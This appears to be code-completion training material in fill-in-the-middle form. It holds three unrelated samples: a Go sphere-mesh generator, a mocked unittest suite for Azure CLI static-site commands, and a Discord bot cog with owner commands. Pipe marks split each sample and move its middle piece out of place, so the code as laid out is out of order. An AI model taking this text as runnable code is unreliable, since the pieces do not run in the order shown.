phiStart, phiLength float32
thetaStart, thetaLength float32
}
func NewSphere(radius float32, nVSegments, nHSegments int) *Sphere {
s := new(Sphere)
s.Init(radius, nVSegments, nHSegments)
return s
}
func (s *Sphere) InitFull(radius float32, nVSegments, nHSegments int,
phiStart, phiLength, thetaStart, thetaLength float32) {
s.radius = radius
s.nVSegments = nVSegments
s.nHSegments = nHSegments
s.phiStart = phiStart
s.phiLength = phiLength
s.thetaStart = thetaStart
s.thetaLength = thetaLength
}
func (s *Sphere) Init(radius float32, nVSegments, nHSegments int) {
const angle float32 = 2 * float32(math.Pi)
s.InitFull(radius, nVSegments, nHSegments, 0, angle, 0, angle)
}
func (s *Sphere) GetMesh() *dax.Mesh {
m := dax.NewMesh()
var positions, normals, uvs dax.AttributeBuffer
thetaEnd := s.thetaStart + s.thetaLength
vertexCount := (s.nVSegments + 1) * (s.nHSegments + 1)
positions.Init("position", vertexCount, 3)
normals.Init("normal", vertexCount, 3)
uvs.Init("uvs", vertexCount, 2)
index := 0
vertices := make([][]uint, s.nHSegments+1, s.nHSegments+1)
normal := math.Vec3{}
for y := 0; y <= s.nHSegments; y++ {
verticesRow := make([]uint, s.nVSegments+1, s.nVSegments+1)
v := float32(y) / float32(s.nHSegments)
for x := 0; x <= s.nVSegments; x++ {
u := float32(x) / float32(s.nVSegments)
px := -s.radius * math.Cos(s.phiStart+u*s.phiLength) * math.Sin(s.thetaStart+v*s.thetaLength)
py := s.radius * math.Cos(s.thetaStart+v*s.thetaLength)
pz := s.radius * math.Sin(s.phiStart+u*s.phiLength) * math.Sin(s.thetaStart+v*s.thetaLength)
| positions.SetXYZ(index, px, py, pz)
normals.SetXYZ(index, normal[0], normal[1], normal[2])
uvs.SetXY(index, u, 1-v)
verticesRow[x] = uint(index)
index++
}
vertices[y] = verticesRow
}
indices := make([]uint, vertexCount, vertexCount)
i := 0
for y := 0; y < s.nHSegments; y++ {
for x := 0; x < s.nVSegments; x++ {
v1 := vertices[y][x+1]
v2 := vertices[y][x]
v3 := vertices[y+1][x]
v4 := vertices[y+1][x+1]
if y != 0 || s.thetaStart > 0 {
indices[i] = v1
i++
indices[i] = v2
i++
indices[i] = v4
i++
}
if y != s.nHSegments-1 || thetaEnd < math.Pi {
indices[i] = v2
i++
indices[i] = v3
i++
indices[i] = v4
i++
}
}
}
m.AddIndices(indices)
m.AddAttributeBuffer(&positions)
m.AddAttributeBuffer(&normals)
m.AddAttributeBuffer(&uvs)
return m
} | normal.Set(px, py, pz)
normal.Normalize()
|
test_staticapp_commands_thru_mock.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest import mock
from azure.cli.command_modules.appservice.static_sites import \
list_staticsites, show_staticsite, delete_staticsite, create_staticsites, CLIError, disconnect_staticsite, \
reconnect_staticsite, list_staticsite_environments, show_staticsite_environment, list_staticsite_domains, \
set_staticsite_domain, delete_staticsite_domain, list_staticsite_functions, list_staticsite_app_settings, \
set_staticsite_app_settings, delete_staticsite_app_settings, list_staticsite_users, \
invite_staticsite_users, update_staticsite_users, update_staticsite, list_staticsite_secrets, \
reset_staticsite_api_key, delete_staticsite_environment, link_user_function, unlink_user_function, get_user_function, \
assign_identity, remove_identity, show_identity
from azure.core.exceptions import ResourceNotFoundError
class TestStaticAppCommands(unittest.TestCase):
def setUp(self):
_set_up_client_mock(self)
_set_up_fake_apps(self)
def test_list_empty_staticapp(self):
self.staticapp_client.list.return_value = []
response = list_staticsites(self.mock_cmd)
self.assertEqual(len(response), 0)
def test_list_staticapp_with_resourcegroup(self):
self.staticapp_client.get_static_sites_by_resource_group.return_value = [self.app1]
response = list_staticsites(self.mock_cmd, self.rg1)
self.staticapp_client.get_static_sites_by_resource_group.assert_called_once_with(self.rg1)
self.assertEqual(len(response), 1)
self.assertIn(self.app1, response)
def test_list_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
response = list_staticsites(self.mock_cmd)
self.assertEqual(len(response), 2)
self.assertIn(self.app1, response)
self.assertIn(self.app2, response)
def test_show_staticapp_with_resourcegroup(self):
self.staticapp_client.get_static_site.return_value = self.app1
response = show_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.assertEqual(self.app1, response)
def test_show_staticapp_without_resourcegroup(self):
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
response = show_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.assertEqual(self.app1, response)
def test_show_staticapp_not_exist(self):
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
with self.assertRaises(CLIError):
show_staticsite(self.mock_cmd, self.name1_not_exist)
def test_delete_staticapp_with_resourcegroup(self):
delete_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.begin_delete_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
def test_delete_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.begin_delete_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
def test_delete_staticapp_not_exist(self):
with self.assertRaises(CLIError):
delete_staticsite(self.mock_cmd, self.name1_not_exist)
def test_create_staticapp(self):
from azure.mgmt.web.models import StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
app_location = './src'
api_location = './api/'
output_location = '/.git/'
tags = {'key1': 'value1'}
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
arg_list = self.staticapp_client.begin_create_or_update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.rg1, arg_list["resource_group_name"])
self.assertEqual(self.location1, arg_list["static_site_envelope"].location)
self.assertEqual(self.source1, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch1, arg_list["static_site_envelope"].branch)
self.assertEqual(tags, arg_list["static_site_envelope"].tags)
self.assertEqual('Free', arg_list["static_site_envelope"].sku.name)
self.assertEqual(app_location, arg_list["static_site_envelope"].build_properties.app_location)
self.assertEqual(api_location, arg_list["static_site_envelope"].build_properties.api_location)
self.assertEqual(output_location, arg_list["static_site_envelope"].build_properties.app_artifact_location)
# assert that a duplicate create call doesn't raise an error or call client create method again
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_create_staticapp_with_standard_sku(self):
from azure.mgmt.web.models import StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, StaticSiteBuildProperties, SkuDescription
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, sku='standard')
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
arg_list = self.staticapp_client.begin_create_or_update_static_site.call_args[1]
self.assertEqual('Standard', arg_list["static_site_envelope"].sku.name)
def test_create_staticapp_missing_token(self):
app_location = './src'
api_location = './api/'
output_location = '/.git/'
tags = {'key1': 'value1'}
with self.assertRaises(CLIError):
with mock.patch("azure.cli.command_modules.appservice.static_sites.show_staticsite", side_effect=ResourceNotFoundError("msg")):
create_staticsites(
self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1,
app_location=app_location, api_location=api_location, output_location=output_location,
tags=tags)
def test_update_staticapp(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
tags = {'key1': 'value1'}
sku = 'Standard'
update_staticsite(self.mock_cmd, self.name1, self.source2, self.branch2, self.token2, tags=tags, sku=sku)
self.staticapp_client.update_static_site.assert_called_once()
arg_list = self.staticapp_client.update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.source2, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch2, arg_list["static_site_envelope"].branch)
self.assertEqual(self.token2, arg_list["static_site_envelope"].repository_token)
self.assertEqual(tags, arg_list["static_site_envelope"].tags)
self.assertEqual(sku, arg_list["static_site_envelope"].sku.name)
def test_update_staticapp_with_no_values_passed_in(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
update_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.update_static_site.assert_called_once()
arg_list = self.staticapp_client.update_static_site.call_args[1]
self.assertEqual(self.name1, arg_list["name"])
self.assertEqual(self.source1, arg_list["static_site_envelope"].repository_url)
self.assertEqual(self.branch1, arg_list["static_site_envelope"].branch)
self.assertEqual(self.token1, arg_list["static_site_envelope"].repository_token)
self.assertEqual(self.app1.tags, arg_list["static_site_envelope"].tags)
self.assertEqual('Free', arg_list["static_site_envelope"].sku.name)
def test_update_staticapp_not_exist(self):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
self.mock_cmd.get_models.return_value = StaticSiteARMResource, SkuDescription
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.list.return_value = [self.app1, self.app2]
with self.assertRaises(CLIError):
update_staticsite(self.mock_cmd, self.name1_not_exist)
def test_disconnect_staticapp_with_resourcegroup(self):
disconnect_staticsite(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.begin_detach_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1) |
disconnect_staticsite(self.mock_cmd, self.name1)
self.staticapp_client.begin_detach_static_site.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
@mock.patch('azure.cli.command_modules.appservice.static_sites.create_staticsites', autospec=True)
def test_reconnect_staticapp_with_resourcegroup(self, create_staticsites_mock):
self.staticapp_client.list.return_value = [self.app1, self.app2]
reconnect_staticsite(self.mock_cmd, self.name1, self.source1, self.branch1, self.token1,
resource_group_name=self.rg1)
create_staticsites_mock.assert_called_once_with(self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, login_with_github=False, no_wait=False)
@mock.patch('azure.cli.command_modules.appservice.static_sites.create_staticsites', autospec=True)
def test_reconnect_staticapp_without_resourcegroup(self, create_staticsites_mock):
self.staticapp_client.list.return_value = [self.app1, self.app2]
reconnect_staticsite(self.mock_cmd, self.name1, self.source1, self.branch1, self.token1)
create_staticsites_mock.assert_called_once_with(self.mock_cmd, self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1, login_with_github=False, no_wait=False)
def test_list_staticsite_environments_with_resourcegroup(self):
list_staticsite_environments(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site_builds.assert_called_once_with(self.rg1, self.name1)
def test_list_staticsite_environments_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_environments(self.mock_cmd, self.name1)
self.staticapp_client.get_static_site_builds.assert_called_once_with(self.rg1, self.name1)
def test_show_staticsite_environment_with_resourcegroup(self):
show_staticsite_environment(self.mock_cmd, self.name1, self.environment1, self.rg1)
self.staticapp_client.get_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_show_staticsite_environment_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
show_staticsite_environment(self.mock_cmd, self.name1, self.environment1)
self.staticapp_client.get_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_set_staticsite_domain_with_resourcegroup(self):
set_staticsite_domain(self.mock_cmd, self.name1, self.hostname1, self.rg1)
self.staticapp_client.begin_validate_custom_domain_can_be_added_to_static_site.assert_called_once_with(
self.rg1, self.name1, self.hostname1, self.hostname1_validation)
self.staticapp_client.begin_create_or_update_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1,
static_site_custom_domain_request_properties_envelope=self.hostname1_validation)
def test_set_staticsite_domain_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
set_staticsite_domain(self.mock_cmd, self.name1, self.hostname1)
self.staticapp_client.begin_validate_custom_domain_can_be_added_to_static_site.assert_called_once_with(
self.rg1, self.name1, self.hostname1, self.hostname1_validation)
self.staticapp_client.begin_create_or_update_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1,
static_site_custom_domain_request_properties_envelope=self.hostname1_validation)
def test_delete_staticsite_domain_with_resourcegroup(self):
delete_staticsite_domain(self.mock_cmd, self.name1, self.hostname1, self.rg1)
self.staticapp_client.begin_delete_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1)
def test_delete_staticsite_domain_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite_domain(self.mock_cmd, self.name1, self.hostname1)
self.staticapp_client.begin_delete_static_site_custom_domain.assert_called_once_with(
resource_group_name=self.rg1, name=self.name1, domain_name=self.hostname1)
def test_delete_staticsite_environment_with_resourcegroup(self):
delete_staticsite_environment(self.mock_cmd, self.name1, self.environment1, self.rg1)
self.staticapp_client.begin_delete_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_delete_staticsite_environment_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
delete_staticsite_environment(self.mock_cmd, self.name1, self.environment1)
self.staticapp_client.begin_delete_static_site_build.assert_called_once_with(self.rg1, self.name1, self.environment1)
def test_list_staticsite_functions_with_resourcegroup(self):
list_staticsite_functions(self.mock_cmd, self.name1, self.rg1, self.environment1)
self.staticapp_client.list_static_site_build_functions.assert_called_once_with(
self.rg1, self.name1, self.environment1)
def test_list_staticsite_functions_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_functions(self.mock_cmd, self.name1, environment_name=self.environment1)
self.staticapp_client.list_static_site_build_functions.assert_called_once_with(
self.rg1, self.name1, self.environment1)
def test_list_staticsite_app_settings_with_resourcegroup(self):
list_staticsite_app_settings(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.list_static_site_app_settings.assert_called_once_with(
self.rg1, self.name1)
def test_list_staticsite_app_settings_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
list_staticsite_app_settings(self.mock_cmd, self.name1)
self.staticapp_client.list_static_site_app_settings.assert_called_once_with(
self.rg1, self.name1)
def test_set_staticsite_app_settings_with_resourcegroup(self):
from azure.mgmt.web.models import StringDictionary
app_settings1_input = ['key1=val1', 'key2=val2==', 'key3=val3=']
self.staticapp_client.list_static_site_app_settings.return_value = StringDictionary(properties={})
set_staticsite_app_settings(self.mock_cmd, self.name1, app_settings1_input, self.rg1)
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_set_staticsite_app_settings_without_resourcegroup(self):
from azure.mgmt.web.models import StringDictionary
app_settings1_input = ['key1=val1', 'key2=val2==', 'key3=val3=']
self.staticapp_client.list.return_value = [self.app1, self.app2]
self.staticapp_client.list_static_site_app_settings.return_value = StringDictionary(properties={})
set_staticsite_app_settings(self.mock_cmd, self.name1, app_settings1_input)
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_delete_staticsite_app_settings_with_resourcegroup(self):
# setup
current_app_settings = {'key1': 'val1', 'key2': 'val2'}
app_settings_keys_to_delete = ['key1']
class AppSettings:
properties = current_app_settings
self.staticapp_client.list_static_site_app_settings.return_value = AppSettings
# action
delete_staticsite_app_settings(self.mock_cmd, self.name1, app_settings_keys_to_delete, self.rg1)
# validate
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_delete_staticsite_app_settings_without_resourcegroup(self):
# setup
current_app_settings = {'key1': 'val1', 'key2': 'val2'}
app_settings_keys_to_delete = ['key1']
class AppSettings:
properties = current_app_settings
self.staticapp_client.list_static_site_app_settings.return_value = AppSettings
self.staticapp_client.list.return_value = [self.app1, self.app2]
# action
delete_staticsite_app_settings(self.mock_cmd, self.name1, app_settings_keys_to_delete)
# validate
self.staticapp_client.create_or_update_static_site_app_settings.assert_called_once()
def test_list_staticsite_users_with_resourcegroup(self):
authentication_provider = 'GitHub'
list_staticsite_users(self.mock_cmd, self.name1, self.rg1, authentication_provider=authentication_provider)
self.staticapp_client.list_static_site_users.assert_called_once_with(
self.rg1, self.name1, authentication_provider)
def test_list_staticsite_users_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
authentication_provider = 'GitHub'
list_staticsite_users(self.mock_cmd, self.name1, authentication_provider=authentication_provider)
self.staticapp_client.list_static_site_users.assert_called_once_with(
self.rg1, self.name1, authentication_provider)
def test_invite_staticsite_users_with_resourcegroup(self):
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
roles = 'Contributor,Reviewer'
invitation_expiration_in_hours = 2
from azure.mgmt.web.models import StaticSiteUserInvitationRequestResource
self.mock_cmd.get_models.return_value = StaticSiteUserInvitationRequestResource
invite_staticsite_users(self.mock_cmd, self.name1, authentication_provider, user_details, self.hostname1,
roles, invitation_expiration_in_hours, self.rg1)
arg_list = self.staticapp_client.create_user_roles_invitation_link.call_args[0]
self.assertEqual(self.rg1, arg_list[0])
self.assertEqual(self.name1, arg_list[1])
self.assertEqual(self.hostname1, arg_list[2].domain)
self.assertEqual(authentication_provider, arg_list[2].provider)
self.assertEqual(user_details, arg_list[2].user_details)
self.assertEqual(invitation_expiration_in_hours, arg_list[2].num_hours_to_expiration)
def test_invite_staticsite_users_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2]
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
roles = 'Contributor,Reviewer'
invitation_expiration_in_hours = 2
from azure.mgmt.web.models import StaticSiteUserInvitationRequestResource
self.mock_cmd.get_models.return_value = StaticSiteUserInvitationRequestResource
invite_staticsite_users(self.mock_cmd, self.name1, authentication_provider, user_details, self.hostname1,
roles, invitation_expiration_in_hours)
arg_list = self.staticapp_client.create_user_roles_invitation_link.call_args[0]
self.assertEqual(self.rg1, arg_list[0])
self.assertEqual(self.name1, arg_list[1])
self.assertEqual(self.hostname1, arg_list[2].domain)
self.assertEqual(authentication_provider, arg_list[2].provider)
self.assertEqual(user_details, arg_list[2].user_details)
self.assertEqual(invitation_expiration_in_hours, arg_list[2].num_hours_to_expiration)
def test_update_staticsite_users_with_resourcegroup_with_all_args(self):
roles = 'Contributor,Reviewer'
authentication_provider = 'GitHub'
user_details = 'JohnDoe'
user_id = 100
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_auth_provider(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_auth_provider_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, 'other_user_id',
'dummy_authentication_provider', 'dummy_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, user_id=user_id, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_auth_provider(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_auth_provider_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
_mock_list_users_for_without_auth_provider(self, 'dummy_user_id', 'dummy_authentication_provider',
'other_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles,
user_details=user_details, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, resource_group_name=self.rg1)
self.staticapp_client.update_static_site_user.assert_called_once_with(
self.rg1, self.name1, authentication_provider, user_id, roles=roles)
def test_update_staticsite_users_with_resourcegroup_without_user_id_user_not_found(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
_mock_list_users_for_without_auth_provider(self, 'dummy_user_id', 'dummy_authentication_provider',
'other_user_details')
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
user_details=user_details, resource_group_name=self.rg1)
def test_update_staticsite_users_with_resourcegroup_without_user_id_without_user_details(self):
roles = 'Contributor,Reviewer'
user_details = 'JohnDoe'
authentication_provider = 'GitHub'
user_id = '100'
_mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details)
with self.assertRaises(CLIError):
update_staticsite_users(self.mock_cmd, self.name1, roles, authentication_provider=authentication_provider,
resource_group_name=self.rg1)
def test_list_staticsite_secrets(self):
from azure.mgmt.web.models import StringDictionary
self.staticapp_client.list_static_site_secrets.return_value = StringDictionary(properties={"apiKey": "key"})
secret = list_staticsite_secrets(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.list_static_site_secrets.assert_called_once_with(resource_group_name=self.rg1, name=self.name1)
from ast import literal_eval
self.assertEqual(literal_eval(secret.__str__())["properties"]["apiKey"], "key")
def test_staticsite_identity_assign(self):
from azure.mgmt.web.models import ManagedServiceIdentity, ManagedServiceIdentityType
self.mock_cmd.get_models.return_value = ManagedServiceIdentity, ManagedServiceIdentityType
assign_identity(self.mock_cmd, self.rg1, self.name1)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_staticsite_identity_remove(self):
from azure.mgmt.web.models import ManagedServiceIdentityType, Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties
get_models = lambda s: ManagedServiceIdentityType if s == "ManagedServiceIdentityType" else Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties
self.mock_cmd.get_models.side_effect = get_models
remove_identity(self.mock_cmd, self.rg1, self.name1)
self.staticapp_client.begin_create_or_update_static_site.assert_called_once()
def test_staticsite_identity_show(self):
mock_site = mock.MagicMock()
mock_site.identity = "identity"
self.staticapp_client.get_static_site.return_value = mock_site
self.assertEqual(show_identity(self.mock_cmd, self.rg1, self.name1), "identity")
def test_reset_staticsite_api_key(self):
from azure.mgmt.web.models import StringDictionary, StaticSiteResetPropertiesARMResource
self.staticapp_client.get_static_site.return_value = self.app1
self.staticapp_client.reset_static_site_api_key.return_value = StringDictionary(properties={"apiKey": "new_key"})
self.mock_cmd.get_models.return_value = StaticSiteResetPropertiesARMResource
secret = reset_staticsite_api_key(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_static_site.assert_called_once_with(self.rg1, self.name1)
self.mock_cmd.get_models.assert_called_once_with('StaticSiteResetPropertiesARMResource')
self.staticapp_client.reset_static_site_api_key.assert_called_once()
from ast import literal_eval
reset_envelope = literal_eval(self.staticapp_client.reset_static_site_api_key.call_args[1]["reset_properties_envelope"].__str__())
self.assertEqual(reset_envelope["repository_token"], self.token1)
@mock.patch("azure.cli.command_modules.appservice.static_sites.show_functionapp")
def test_functions_link(self, *args, **kwargs):
functionapp_name = "functionapp"
functionapp_resource_id = "/subscriptions/sub/resourceGroups/{}/providers/Microsoft.Web/sites/{}".format(
self.rg1, functionapp_name
)
link_user_function(self.mock_cmd, self.name1, self.rg1, functionapp_resource_id)
self.staticapp_client.begin_register_user_provided_function_app_with_static_site.assert_called_once()
@mock.patch("azure.cli.command_modules.appservice.static_sites.get_user_function", return_value=[mock.MagicMock()])
def test_functions_unlink(self, *args, **kwargs):
unlink_user_function(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.detach_user_provided_function_app_from_static_site.assert_called_once()
def test_functions_show(self, *args, **kwargs):
get_user_function(self.mock_cmd, self.name1, self.rg1)
self.staticapp_client.get_user_provided_function_apps_for_static_site.assert_called_once()
def _set_up_client_mock(self):
self.mock_cmd = mock.MagicMock()
self.mock_cmd.cli_ctx = mock.MagicMock()
self.staticapp_client = mock.MagicMock()
client_factory_patcher = mock.patch(
'azure.cli.command_modules.appservice.static_sites._get_staticsites_client_factory', autospec=True)
self.addCleanup(client_factory_patcher.stop)
self.mock_static_site_client_factory = client_factory_patcher.start()
self.mock_static_site_client_factory.return_value = self.staticapp_client
def _set_up_fake_apps(self):
from azure.mgmt.web.models import StaticSiteCustomDomainRequestPropertiesARMResource
self.rg1 = 'rg1'
self.name1 = 'name1'
self.name1_not_exist = 'name1_not_exist'
self.location1 = 'location1'
self.source1 = 'https://github.com/Contoso/My-First-Static-App'
self.branch1 = 'dev'
self.token1 = 'TOKEN_1'
self.environment1 = 'default'
self.hostname1 = 'www.app1.com'
self.hostname1_validation = StaticSiteCustomDomainRequestPropertiesARMResource(validation_method="cname-delegation")
self.app1 = _contruct_static_site_object(
self.rg1, self.name1, self.location1,
self.source1, self.branch1, self.token1)
self.rg2 = 'rg2'
self.name2 = 'name2'
self.location2 = 'location2'
self.source2 = 'https://github.com/Contoso/My-Second-Static-App'
self.branch2 = 'master'
self.token2 = 'TOKEN_2'
self.environment1 = 'prod'
self.hostname1 = 'www.app2.com'
self.app2 = _contruct_static_site_object(
self.rg2, self.name2, self.location2,
self.source2, self.branch2, self.token2)
def _contruct_static_site_object(rg, app_name, location, source, branch, token):
from azure.mgmt.web.models import StaticSiteARMResource, SkuDescription
app = StaticSiteARMResource(
location=location,
repository_url=source,
branch=branch,
repository_token=token,
sku=SkuDescription(name='Free', tier='Free'))
app.name = app_name
app.id = \
"/subscriptions/sub/resourceGroups/{}/providers/Microsoft.Web/staticSites/{}".format(rg, app_name)
return app
def _mock_list_users_for_without_auth_provider(self, user_id, authentication_provider, user_details):
class User:
def __init__(self, name, provider, display_name):
self.name = name
self.provider = provider
self.display_name = display_name
user1 = User(user_id, authentication_provider, user_details)
user2 = User(user_id + '2', authentication_provider + '2', user_details + '2')
self.staticapp_client.list_static_site_users.return_value = [user1, user2] |
def test_disconnect_staticapp_without_resourcegroup(self):
self.staticapp_client.list.return_value = [self.app1, self.app2] |
owner-normal.py | import json
import os
import sys
import disnake
from disnake.ext import commands
from disnake.ext.commands import Context
from helpers import json_manager, checks
import logging
if not os.path.isfile("../config.json"):
sys.exit("'config.json' not found by general-normal! Please add it and try again.")
else:
with open("../config.json") as file:
config = json.load(file)
''' Logging '''
logger = logging.getLogger('discord')
logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='../logs/discord.log', encoding='utf-8',mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
class Owner(commands.Cog, name="owner-normal"):
def __init__(self, bot):
self.bot = bot
@commands.command(
name="shutdown",
description="Make the bot shutdown.",
)
@checks.is_owner()
async def shutdown(self, context: Context):
"""
Makes the bot shutdown.
"""
embed = disnake.Embed(
description="Shutting down. Bye! :wave:",
color=0x9C84EF
)
logger.info(f"Shutting down. Bye! :wave:")
await context.send(embed=embed)
await self.bot.close()
@commands.command(
name="say",
description="The bot will say anything you want.",
)
@checks.is_owner()
async def say(self, context: Context, *, message: str):
"""
The bot will say anything you want.
"""
logger.info(f"Saying '{message}'")
await context.send(message)
@commands.command(
name="embed",
description="The bot will say anything you want, but within embeds.",
)
@checks.is_owner()
async def | (self, context: Context, *, message: str):
"""
The bot will say anything you want, but within embeds.
"""
embed = disnake.Embed(
description=message,
color=0x9C84EF
)
logger.info(f"Saying '{message}'")
await context.send(embed=embed)
@commands.group(
name="blacklist"
)
async def blacklist(self, context: Context):
"""
Lets you add or remove a user from not being able to use the bot.
"""
if context.invoked_subcommand is None:
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed = disnake.Embed(
title=f"There are currently {len(blacklist['ids'])} blacklisted IDs",
description=f"{', '.join(str(id) for id in blacklist['ids'])}",
color=0x9C84EF
)
await context.send(embed=embed)
@blacklist.command(
name="add"
)
async def blacklist_add(self, context: Context, member: disnake.Member = None):
"""
